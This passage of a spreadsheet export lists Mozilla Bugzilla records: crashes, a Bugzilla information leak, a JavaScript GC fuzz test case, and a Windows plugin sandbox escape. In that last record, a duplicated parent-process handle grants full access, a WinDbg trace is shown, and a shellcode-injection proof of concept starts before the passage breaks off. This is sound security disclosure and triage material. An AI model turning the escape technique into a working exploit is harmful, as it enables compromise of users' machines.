      <c r="U2409" t="n">
        <v>0</v>
      </c>
      <c r="V2409" t="n">
        <v>7</v>
      </c>
      <c r="W2409" t="inlineStr">
        <is>
          <t>Was looking at bug 48845 and tried to mark it as a duplicate of bug 18213.
A bug in mozilla's form handling messed up the hidden field in the bug
form and changed the hidden field named 'id', from value 48845 to
4884548845.
Bugzilla then marked bug 18213 as being a duplicate of the non-existant
bug 4884548845.
&lt;INPUT TYPE=HIDDEN NAME="id" VALUE=48845&gt;
Bugzilla should do more error checking and verify that the bug number its
trying to process actually exists.</t>
        </is>
      </c>
      <c r="X2409" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2410">
      <c r="A2410" t="n">
        <v>731339</v>
      </c>
      <c r="B2410" t="inlineStr">
        <is>
          <t>2012-02-28 11:14:28 -0800</t>
        </is>
      </c>
      <c r="C2410" t="inlineStr">
        <is>
          <t>Verify if these slaves are supposed to show up on http://build.mozilla.org/builds/last-job-per-slave.html</t>
        </is>
      </c>
      <c r="D2410" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2410" t="n">
        <v>1</v>
      </c>
      <c r="F2410" t="n">
        <v>1</v>
      </c>
      <c r="G2410" t="n">
        <v>5</v>
      </c>
      <c r="H2410" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2410" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2410" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2410" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2410" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2410" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2410" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2410" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2410" t="inlineStr">
        <is>
          <t>[buildduty]</t>
        </is>
      </c>
      <c r="Q2410" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2410" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2410" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2410" t="n">
        <v>1</v>
      </c>
      <c r="U2410" t="n">
        <v>0</v>
      </c>
      <c r="V2410" t="n">
        <v>11</v>
      </c>
      <c r="W2410" t="inlineStr">
        <is>
          <t>talos-r4-snow-003 - preproduction?
talos-r4-snow-082	
talos-r4-snow-083
talos-r4-snow-085
tegra-178
tegra-180
tegra-184
tegra-185
tegra-186
tegra-193
tegra-197
tegra-218
tegra-226
tegra-228
tegra-239
tegra-241</t>
        </is>
      </c>
      <c r="X2410" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2411">
      <c r="A2411" t="n">
        <v>1325717</v>
      </c>
      <c r="B2411" t="inlineStr">
        <is>
          <t>2016-12-23 16:15:49 -0800</t>
        </is>
      </c>
      <c r="C2411" t="inlineStr">
        <is>
          <t>Make Favicons in all panels follow the new Activity Stream style</t>
        </is>
      </c>
      <c r="D2411" t="inlineStr">
        <is>
          <t>2017-04-06 01:14:28 -0700</t>
        </is>
      </c>
      <c r="E2411" t="n">
        <v>1</v>
      </c>
      <c r="F2411" t="n">
        <v>1</v>
      </c>
      <c r="G2411" t="n">
        <v>2</v>
      </c>
      <c r="H2411" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2411" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J2411" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K2411" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2411" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2411" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2411" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2411" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2411" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q2411" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2411" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2411" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2411" t="n">
        <v>1</v>
      </c>
      <c r="U2411" t="n">
        <v>0</v>
      </c>
      <c r="V2411" t="n">
        <v>6</v>
      </c>
      <c r="W2411" t="inlineStr">
        <is>
          <t>Created attachment 8821684
newfavicons
The favicons in the history/bookmark panel look out of place compared to the new AS panel. 
The different favicon borders and corner radius create a disjoint experience.</t>
        </is>
      </c>
      <c r="X2411" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2412">
      <c r="A2412" t="n">
        <v>1234571</v>
      </c>
      <c r="B2412" t="inlineStr">
        <is>
          <t>2015-12-22 08:38:16 -0800</t>
        </is>
      </c>
      <c r="C2412" t="inlineStr">
        <is>
          <t>UAF in MutexAutoLock::MutexAutoLock on frame-encoded callback when closing active webrtc call</t>
        </is>
      </c>
      <c r="D2412" t="inlineStr">
        <is>
          <t>2016-09-22 14:41:37 -0700</t>
        </is>
      </c>
      <c r="E2412" t="n">
        <v>1</v>
      </c>
      <c r="F2412" t="n">
        <v>1</v>
      </c>
      <c r="G2412" t="n">
        <v>3</v>
      </c>
      <c r="H2412" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2412" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2412" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K2412" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2412" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2412" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2412" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2412" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2412" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main44+][adv-esr38.6+]</t>
        </is>
      </c>
      <c r="Q2412" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2412" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2412" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T2412" t="n">
        <v>1</v>
      </c>
      <c r="U2412" t="n">
        <v>0</v>
      </c>
      <c r="V2412" t="n">
        <v>15</v>
      </c>
      <c r="W2412" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-7676704e-729d-432a-81ef-731c02151222.
=============================================================
Hit this testing openh264 1.5.3 on nightly, when closing an active call (pc_test.html, h264 required).  I'd made ~5 calls, and the last one had run for a while.  Other tabs were open. Device was nexus 10 (tablet).  Was unable to repeat in several attempts.
Bug would be in the gecko side since 'late' callbacks should be ignored</t>
        </is>
      </c>
      <c r="X2412" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2413">
      <c r="A2413" t="n">
        <v>731178</v>
      </c>
      <c r="B2413" t="inlineStr">
        <is>
          <t>2012-02-28 05:55:31 -0800</t>
        </is>
      </c>
      <c r="C2413" t="inlineStr">
        <is>
          <t>[SECURITY] field-events.js.tmpl discloses product and component names that the user is not allowed to see</t>
        </is>
      </c>
      <c r="D2413" t="inlineStr">
        <is>
          <t>2012-11-14 04:30:21 -0800</t>
        </is>
      </c>
      <c r="E2413" t="n">
        <v>1</v>
      </c>
      <c r="F2413" t="n">
        <v>1</v>
      </c>
      <c r="G2413" t="n">
        <v>4</v>
      </c>
      <c r="H2413" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2413" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2413" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K2413" t="inlineStr">
        <is>
          <t>3.3.4</t>
        </is>
      </c>
      <c r="L2413" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2413" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2413" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2413" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2413" t="inlineStr"/>
      <c r="Q2413" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2413" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2413" t="inlineStr">
        <is>
          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T2413" t="n">
        <v>1</v>
      </c>
      <c r="U2413" t="n">
        <v>0</v>
      </c>
      <c r="V2413" t="n">
        <v>14</v>
      </c>
      <c r="W2413" t="inlineStr">
        <is>
          <t>If a custom field visibility is controlled by a product or a component of a product you cannot see, their names are displayed in the JS code generated by field-events.js.tmpl:
showFieldWhen('cf_audience', 'component', [ 'very_secret_component' ]);
The UI itself has no reference to this component, but looking at the source code of the page discloses this information. I'm not sure since when this problem exists. This template exists since Bugzilla 3.4, see bug 308253, but maybe this problem has been introduced later. We would have to check.
This bug will probably be fixed by bug 695514 for trunk (and 4.2, if there is a valuable perf win).</t>
        </is>
      </c>
      <c r="X2413" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2414">
      <c r="A2414" t="n">
        <v>260737</v>
      </c>
      <c r="B2414" t="inlineStr">
        <is>
          <t>2004-09-21 02:41:46 -0700</t>
        </is>
      </c>
      <c r="C2414" t="inlineStr">
        <is>
          <t>Thunderbird help should  be on mozilla.org</t>
        </is>
      </c>
      <c r="D2414" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E2414" t="n">
        <v>1</v>
      </c>
      <c r="F2414" t="n">
        <v>1</v>
      </c>
      <c r="G2414" t="n">
        <v>5</v>
      </c>
      <c r="H2414" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2414" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J2414" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2414" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2414" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2414" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2414" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2414" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2414" t="inlineStr"/>
      <c r="Q2414" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2414" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2414" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2414" t="n">
        <v>1</v>
      </c>
      <c r="U2414" t="n">
        <v>0</v>
      </c>
      <c r="V2414" t="n">
        <v>9</v>
      </c>
      <c r="W2414" t="inlineStr">
        <is>
          <t>I think the help pages should be moved to this URI:
 &lt;http://www.mozilla.org/products/thunderbird/help/&gt;</t>
        </is>
      </c>
      <c r="X2414" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2415">
      <c r="A2415" t="n">
        <v>280856</v>
      </c>
      <c r="B2415" t="inlineStr">
        <is>
          <t>2005-02-02 15:49:39 -0800</t>
        </is>
      </c>
      <c r="C2415" t="inlineStr">
        <is>
          <t>some table definitions are altered *after* the --TABLE-- limit in checksetup.pl</t>
        </is>
      </c>
      <c r="D2415" t="inlineStr">
        <is>
          <t>2005-03-11 11:37:17 -0800</t>
        </is>
      </c>
      <c r="E2415" t="n">
        <v>1</v>
      </c>
      <c r="F2415" t="n">
        <v>1</v>
      </c>
      <c r="G2415" t="n">
        <v>4</v>
      </c>
      <c r="H2415" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2415" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2415" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K2415" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L2415" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2415" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2415" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2415" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2415" t="inlineStr"/>
      <c r="Q2415" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2415" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S2415" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T2415" t="n">
        <v>1</v>
      </c>
      <c r="U2415" t="n">
        <v>0</v>
      </c>
      <c r="V2415" t="n">
        <v>10</v>
      </c>
      <c r="W2415" t="inlineStr">
        <is>
          <t>In checksetup.pl, there is a comment which specifies that:
# If you had to change the --TABLE-- definition in any way, then add your
# differential change code *** A B O V E *** this comment.
This is at line 4237. But there is code starting at line 4540 which still alters
table definitions. We should correct this as checksetup.pl is already hard
enough to read. ;)</t>
        </is>
      </c>
      <c r="X2415" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2416">
      <c r="A2416" t="n">
        <v>1230483</v>
      </c>
      <c r="B2416" t="inlineStr">
        <is>
          <t>2015-12-04 01:58:58 -0800</t>
        </is>
      </c>
      <c r="C2416" t="inlineStr">
        <is>
          <t>crash in mozilla::MediaDecoder::NotifySuspendedStatusChanged</t>
        </is>
      </c>
      <c r="D2416" t="inlineStr">
        <is>
          <t>2016-09-22 14:41:48 -0700</t>
        </is>
      </c>
      <c r="E2416" t="n">
        <v>1</v>
      </c>
      <c r="F2416" t="n">
        <v>1</v>
      </c>
      <c r="G2416" t="n">
        <v>3</v>
      </c>
      <c r="H2416" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2416" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2416" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K2416" t="inlineStr">
        <is>
          <t>42 Branch</t>
        </is>
      </c>
      <c r="L2416" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2416" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2416" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2416" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2416" t="inlineStr">
        <is>
          <t>[adv-main44+][adv-esr38.6+]</t>
        </is>
      </c>
      <c r="Q2416" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2416" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2416" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T2416" t="n">
        <v>1</v>
      </c>
      <c r="U2416" t="n">
        <v>0</v>
      </c>
      <c r="V2416" t="n">
        <v>37</v>
      </c>
      <c r="W2416" t="inlineStr">
        <is>
          <t>Created attachment 8695799
minidump stack from one of bughunter's crashes
This bug was filed from the Socorro interface and is 
report bp-e2e0677b-ff59-4f29-af04-3f6fb2151204.
=============================================================
s-s since this is rated exploitability high.
This is not that reproducible when testing manually. I did it once above with released Firefox 42 by reloading several times and crashing on shutdown.
You can try:
1. http://interactive.aljazeera.com/aje/2014/piratefishingdoc/#stage1
2. reload x times
3. shutdown
Found in bughunter on http://interactive.aljazeera.com/aje/2014/piratefishingdoc/#stage1 on Beta/43, Aurora/44, Nightly/45 Windows *only* both x86 and x86_64 as a different media encoder related crash [@ nsURIHashKey::HashKey(nsIURI const *)</t>
        </is>
      </c>
      <c r="X2416" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2417">
      <c r="A2417" t="n">
        <v>1796901</v>
      </c>
      <c r="B2417" t="inlineStr">
        <is>
          <t>2022-10-22 02:45:07 -0700</t>
        </is>
      </c>
      <c r="C2417" t="inlineStr">
        <is>
          <t>Assertion failure: zoneIsDead, at js/src/gc/GC.cpp:2083</t>
        </is>
      </c>
      <c r="D2417" t="inlineStr">
        <is>
          <t>2024-04-09 10:57:19 -0700</t>
        </is>
      </c>
      <c r="E2417" t="n">
        <v>1</v>
      </c>
      <c r="F2417" t="n">
        <v>1</v>
      </c>
      <c r="G2417" t="n">
        <v>3</v>
      </c>
      <c r="H2417" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2417" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2417" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K2417" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2417" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2417" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2417" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2417" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2417" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-esr102.5+]</t>
        </is>
      </c>
      <c r="Q2417" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2417" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2417" t="inlineStr">
        <is>
          <t>108 Branch</t>
        </is>
      </c>
      <c r="T2417" t="n">
        <v>1</v>
      </c>
      <c r="U2417" t="n">
        <v>0</v>
      </c>
      <c r="V2417" t="n">
        <v>13</v>
      </c>
      <c r="W2417" t="inlineStr">
        <is>
          <t>```js
gcslice(0);
evalcx("lazy");
abortgc();
```
```
(gdb) bt
#0  js::gc::GCRuntime::sweepZones (this=this@entry=0x7ffff6c18778, gcx=gcx@entry=0x7ffff6c18790, destroyingRuntime=true) at /home/skygentoo/trees/mozilla-central/js/src/gc/GC.cpp:2083
#1  0x00005555575ed24f in js::gc::GCRuntime::incrementalSlice (this=this@entry=0x7ffff6c18778, budget=..., reason=reason@entry=JS::GCReason::DESTROY_RUNTIME, budgetWasIncreased=false) at /home/skygentoo/trees/mozilla-central/js/src/gc/GC.cpp:3356
#2  0x00005555575f0114 in js::gc::GCRuntime::gcCycle (this=this@entry=0x7ffff6c18778, nonincrementalByAPI=false, budgetArg=..., reason=reason@entry=JS::GCReason::DESTROY_RUNTIME) at /home/skygentoo/trees/mozilla-central/js/src/gc/GC.cpp:3841
#3  0x00005555575f12c6 in js::gc::GCRuntime::collect (this=this@entry=0x7ffff6c18778, nonincrementalByAPI=&lt;optimized out&gt;, budget=..., reason=reason@entry=JS::GCReason::DESTROY_RUNTIME) at /home/skygentoo/trees/mozilla-central/js/src/gc/GC.cpp:4029
#4  0x00005555575c6d48 in js::gc::GCRuntime::gc (this=0x7ffff6c18778, options=JS::GCOptions::Shutdown, reason=JS::GCReason::DESTROY_RUNTIME) at /home/skygentoo/trees/mozilla-central/js/src/gc/GC.cpp:4106
#5  0x000055555708eef1 in JSRuntime::destroyRuntime (this=0x7ffff6c18000) at /home/skygentoo/trees/mozilla-central/js/src/vm/Runtime.cpp:266
#6  0x0000555556f3d056 in js::DestroyContext (cx=cx@entry=0x7ffff6c2a100) at /home/skygentoo/trees/mozilla-central/js/src/vm/JSContext.cpp:225
#7  0x00005555572a470a in JS_DestroyContext (cx=0x7ffff7c12a40 &lt;_IO_stdfile_2_lock&gt;, cx@entry=0x7ffff6c2a100) at /home/skygentoo/trees/mozilla-central/js/src/jsapi.cpp:400
#8  0x0000555556c0cd07 in main::$_3::operator() (this=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:12120
#9  mozilla::ScopeExit&lt;main::$_3&gt;::~ScopeExit (this=&lt;optimized out&gt;) at /home/skygentoo/shell-cache/js-dbg-64-linux-x86_64-321d39a49683/objdir-js/dist/include/mozilla/ScopeExit.h:106
#10 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:12330
(gdb)
```
```
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/2815b08bfbd2
user:        Jon Coppeard
date:        Mon Oct 17 17:09:07 2022 +0000
summary:     Bug 1791975 - Don't sweep realms that were allocated during incremental GC r=jandem
```
Run with `--fuzzing-safe --no-threads --no-baseline --no-ion`, compile with `AR=ar sh ./configure --enable-debug --with-ccache --enable-nspr-build --enable-ctypes --enable-debug-symbols --enable-gczeal --enable-rust-simd --disable-tests`, tested on m-c rev 321d39a49683.
Setting s-s just-in-case. Jon, is bug 1791975 a likely regressor? FYI bug 1791975 seems to be a restricted bug.</t>
        </is>
      </c>
      <c r="X2417" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2418">
      <c r="A2418" t="n">
        <v>1016519</v>
      </c>
      <c r="B2418" t="inlineStr">
        <is>
          <t>2014-05-27 12:02:27 -0700</t>
        </is>
      </c>
      <c r="C2418" t="inlineStr">
        <is>
          <t>crash in js::LifoAlloc::freeAll() | js::jit::BaselineScript::~BaselineScript() with address 0x5a5a5a62</t>
        </is>
      </c>
      <c r="D2418" t="inlineStr">
        <is>
          <t>2016-06-04 15:33:15 -0700</t>
        </is>
      </c>
      <c r="E2418" t="n">
        <v>1</v>
      </c>
      <c r="F2418" t="n">
        <v>1</v>
      </c>
      <c r="G2418" t="n">
        <v>3</v>
      </c>
      <c r="H2418" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2418" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2418" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2418" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2418" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2418" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2418" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2418" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2418" t="inlineStr">
        <is>
          <t>[adv-main32+]</t>
        </is>
      </c>
      <c r="Q2418" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2418" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2418" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T2418" t="n">
        <v>1</v>
      </c>
      <c r="U2418" t="n">
        <v>0</v>
      </c>
      <c r="V2418" t="n">
        <v>23</v>
      </c>
      <c r="W2418" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-ce2043f3-810d-400c-b43b-6dd032140527.
=============================================================
Steps to Reproduce for me 
I had 3 tabs open 
Facebook
my google mail 
my hotmail aka outlook mail 
I was getting the stop script warning https://support.mozilla.org/en-US/kb/warning-unresponsive-script
I clicked the debug button on the nightly then it went away then it came back then I clicked debug again and after it this time it crashed my firefox</t>
        </is>
      </c>
      <c r="X2418" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2419">
      <c r="A2419" t="n">
        <v>475901</v>
      </c>
      <c r="B2419" t="inlineStr">
        <is>
          <t>2009-01-28 23:40:39 -0800</t>
        </is>
      </c>
      <c r="C2419" t="inlineStr">
        <is>
          <t>nsIAccessibleValue interface changed without change uuid</t>
        </is>
      </c>
      <c r="D2419" t="inlineStr">
        <is>
          <t>2009-04-03 09:52:33 -0700</t>
        </is>
      </c>
      <c r="E2419" t="n">
        <v>1</v>
      </c>
      <c r="F2419" t="n">
        <v>1</v>
      </c>
      <c r="G2419" t="n">
        <v>3</v>
      </c>
      <c r="H2419" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2419" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2419" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K2419" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2419" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2419" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2419" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2419" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2419" t="inlineStr"/>
      <c r="Q2419" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2419" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2419" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2419" t="n">
        <v>1</v>
      </c>
      <c r="U2419" t="n">
        <v>0</v>
      </c>
      <c r="V2419" t="n">
        <v>15</v>
      </c>
      <c r="W2419" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 XPCOMViewer/1.0a1
Build Identifier: 
nsIAccessibleValue
readonly atribute removed:  attribute double 
removed method:  boolean setCurrentValue (in double value);                                    
Reproducible: Always
Actual Results:  
old uuid
Expected Results:  
new uuid</t>
        </is>
      </c>
      <c r="X2419" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2420">
      <c r="A2420" t="n">
        <v>1117140</v>
      </c>
      <c r="B2420" t="inlineStr">
        <is>
          <t>2015-01-02 09:32:09 -0800</t>
        </is>
      </c>
      <c r="C2420" t="inlineStr">
        <is>
          <t>GMP sandbox  break-out on Windows through process handle</t>
        </is>
      </c>
      <c r="D2420" t="inlineStr">
        <is>
          <t>2024-05-30 08:39:22 -0700</t>
        </is>
      </c>
      <c r="E2420" t="n">
        <v>1</v>
      </c>
      <c r="F2420" t="n">
        <v>1</v>
      </c>
      <c r="G2420" t="n">
        <v>3</v>
      </c>
      <c r="H2420" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2420" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2420" t="inlineStr">
        <is>
          <t>IPC</t>
        </is>
      </c>
      <c r="K2420" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2420" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2420" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N2420" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2420" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2420" t="inlineStr">
        <is>
          <t>[adv-main35+]</t>
        </is>
      </c>
      <c r="Q2420" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2420" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2420" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T2420" t="n">
        <v>1</v>
      </c>
      <c r="U2420" t="n">
        <v>0</v>
      </c>
      <c r="V2420" t="n">
        <v>57</v>
      </c>
      <c r="W2420" t="inlineStr">
        <is>
          <t>The sandboxed plugin-container.exe process on Windows holds a handle to the parent process. We can observe this in windbg:
0:007:x86&gt; !handle 18c 1
Handle 18c
  Type         	Process
0:007:x86&gt; !handle 18c 2
Handle 18c
  Attributes   	0
  GrantedAccess	0x101441:
         Synch
  HandleCount  	9
  PointerCount 	283079
0:007:x86&gt; !handle 18c 8
Handle 18c
  Object Specific Information
    Process Id  5868
    Parent Process  1720
    Base Priority 8
While the access rights on this handle are somewhat limited (0x101441) it still allows us to duplicate handles in the parent process (PROCESS_DUP_HANDLE). Using DuplicateHandle we can issue a call that duplicate the process handle from the parent process to our current process (-1 a pseudo handles to the parent and current (sandboxed process):
DuplicateHandle(0x18c, -1, -1, 0, 0, 0, 2)
The call will succeed and a new handle to the parent process is created in the sandboxed child. This handle has full access to the parent which then allows for executing arbitrary code in the parent through CreateRemoteThread:
0:007:x86&gt; !handle 36c 1
Handle 36c
  Type         	Process
0:007:x86&gt; !handle 36c 2
Handle 36c
  Attributes   	0
  GrantedAccess	0x1fffff:
         Delete,ReadControl,WriteDac,WriteOwner,Synch
  HandleCount  	9
  PointerCount 	282785
0:007:x86&gt; !handle 36c 8
Handle 36c
  Object Specific Information
    Process Id  5868
    Parent Process  1720
    Base Priority 8
This is a quick and dirty PoC which injects a "shellcode" into the sandboxed process (PID on the command line and address of DuplicateHandle and the Handle are currently hardcoded):
#include "stdafx.h"
#include &lt;stdio.h&gt;
#include &lt;Windows.h&gt;
unsigned char code[] = ""
"\xcc\xcc\x90\x90"
